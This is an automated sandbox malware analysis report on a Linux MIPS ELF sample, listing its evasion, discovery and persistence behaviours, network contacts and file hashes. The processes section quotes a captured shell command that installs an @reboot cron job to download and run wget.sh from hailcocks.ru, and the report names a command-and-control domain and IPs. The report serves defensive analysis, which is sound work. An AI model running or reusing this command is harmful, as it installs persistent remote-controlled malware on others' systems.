Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-da5mza1khs
Target b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
SHA256 b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840
Tags
defense_evasion discovery execution persistence privilege_escalation
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840

Threat Level: Shows suspicious behavior

The file b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf was found to show suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalation

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:49

Reported

2024-10-27 02:51

Platform

debian9-mipsel-20240611-en

Max time kernel

142s

Max time network

139s

Command Line

[/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A

Renames itself

Description | Indicator | Process | Target
N/A | N/A | /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf | N/A

Unexpected DNS network traffic destination

Description | Indicator | Process | Target
Destination IP | 168.235.111.72 | N/A | N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description | Indicator | Process | Target
File opened for modification | /var/spool/cron/crontabs/tmp.DDLmqg | /usr/bin/crontab | N/A

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | [watchdog/0] | /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf | N/A

Reads runtime system information

discovery
Description | Indicator | Process | Target
File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A
File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A
File opened for reading | /proc/mounts | /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf | N/A

Processes

/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf

[/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country | Destination | Domain | Proto
US | 168.235.111.72:53 | kingstonwikkerink.dyn | udp
CZ | 195.133.92.51:24240 | kingstonwikkerink.dyn | tcp

Files

/var/spool/cron/crontabs/tmp.DDLmqg

MD5 8c9ff02103c706a091467f66f463d116
SHA1 8389f2e1cb1e2bb7034773f88119c45482870a46
SHA256 e001ff127ebf9d6ceed98f1c5b5326b833864a8473b0e072b64de7315ed8c6f4
SHA512 da6e9fa9b71115b07d4e4a561800b89732fc20031c955ad9aa11befda0c2567547aa324fb47ad3db536a9dfb93173352d3c3613124b13ae866ac44d77cf8e555